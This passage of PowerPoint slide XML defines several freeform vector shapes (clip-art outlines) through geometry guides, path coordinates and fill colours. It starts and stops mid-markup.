              <a:gd name="T28" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T51" fmla="*/ 0 h 90"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T53" fmla="*/ 0 h 90"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T78" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T79" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T80" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T81" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T82" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T83" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T84" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T85" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T86" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T87" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T88" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T89" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T90" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T91" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T92" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T93" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T94" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T95" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T96" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T97" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T98" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T99" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T100" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T101" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T102" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T103" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T104" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T105" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T106" fmla="*/ 2147483647 w 131"/>
              <a:gd name="T107" fmla="*/ 2147483647 h 9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1"/>
              <a:gd name="T163" fmla="*/ 0 h 90"/>
              <a:gd name="T164" fmla="*/ 131 w 131"/>
              <a:gd name="T165" fmla="*/ 90 h 9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1" h="90">
                <a:moveTo>
                  <a:pt x="1" y="68"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="78"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94" y="85"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106" y="66"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102" y="68"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="68"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99D8D8"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10415" name="Freeform 496"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2867025" y="6605588"/>
            <a:ext cx="219075" cy="68262"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 97"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 30"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 97"/>
              <a:gd name="T3" fmla="*/ 0 h 30"/>
              <a:gd name="T4" fmla="*/ 0 w 97"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 30"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 97"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 30"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 97"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 30"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 97"/>
              <a:gd name="T16" fmla="*/ 0 h 30"/>
              <a:gd name="T17" fmla="*/ 97 w 97"/>
              <a:gd name="T18" fmla="*/ 30 h 30"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="97" h="30">
                <a:moveTo>
                  <a:pt x="97" y="10"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97" y="10"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10416" name="Freeform 497"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2974975" y="6626225"/>
            <a:ext cx="95250" cy="31750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 42"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 42"/>
              <a:gd name="T3" fmla="*/ 0 h 14"/>
              <a:gd name="T4" fmla="*/ 0 w 42"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 42"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 42"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 42"/>
              <a:gd name="T16" fmla="*/ 0 h 14"/>
              <a:gd name="T17" fmla="*/ 42 w 42"/>
              <a:gd name="T18" fmla="*/ 14 h 14"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="42" h="14">
                <a:moveTo>
                  <a:pt x="42" y="6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="6"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99D8D8"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10417" name="Freeform 498"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2879725" y="6610350"/>
            <a:ext cx="63500" cy="25400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 28"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T2" fmla="*/ 0 w 28"/>
              <a:gd name="T3" fmla="*/ 0 h 11"/>
              <a:gd name="T4" fmla="*/ 0 w 28"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 28"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 28"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 11"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 28"/>
              <a:gd name="T16" fmla="*/ 0 h 11"/>
              <a:gd name="T17" fmla="*/ 28 w 28"/>
              <a:gd name="T18" fmla="*/ 11 h 11"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="28" h="11">
                <a:moveTo>
                  <a:pt x="28" y="5"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="5"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99D8D8"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10418" name="Freeform 499"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2724150" y="6635750"/>
            <a:ext cx="365125" cy="120650"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 162"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T2" fmla="*/ 0 w 162"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T33" fmla="*/ 0 h 54"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 162"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 54"/>
              <a:gd name="T68" fmla="*/ 0 w 162"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 5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2"/>
              <a:gd name="T106" fmla="*/ 0 h 54"/>
              <a:gd name="T107" fmla="*/ 162 w 162"/>
              <a:gd name="T108" fmla="*/ 54 h 5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2" h="54">
                <a:moveTo>
                  <a:pt x="0" y="16"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="153" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="138" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99D8D8"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10419" name="Freeform 500"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3089275" y="6621463"/>
            <a:ext cx="131762" cy="58737"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 58"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 26"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 58"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 26"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 58"/>
              <a:gd name="T5" fmla="*/ 0 h 26"/>
              <a:gd name="T6" fmla="*/ 0 w 58"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 26"/>
              <a:gd name="T8" fmla="*/ 0 w 58"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 26"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 58"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 26"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 60000 65536"/>
              <a:gd name="T16" fmla="*/ 0 60000 65536"/>
              <a:gd name="T17" fmla="*/ 0 60000 65536"/>
              <a:gd name="T18" fmla="*/ 0 w 58"/>
              <a:gd name="T19" fmla="*/ 0 h 26"/>
              <a:gd name="T20" fmla="*/ 58 w 58"/>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8" h="26">
                <a:moveTo>
                  <a:pt x="6" y="26"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="58" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="26"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="001999"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10420" name="Freeform 501"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2751137" y="6370638"/>
            <a:ext cx="69850" cy="279400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 31"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 124"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 31"/>
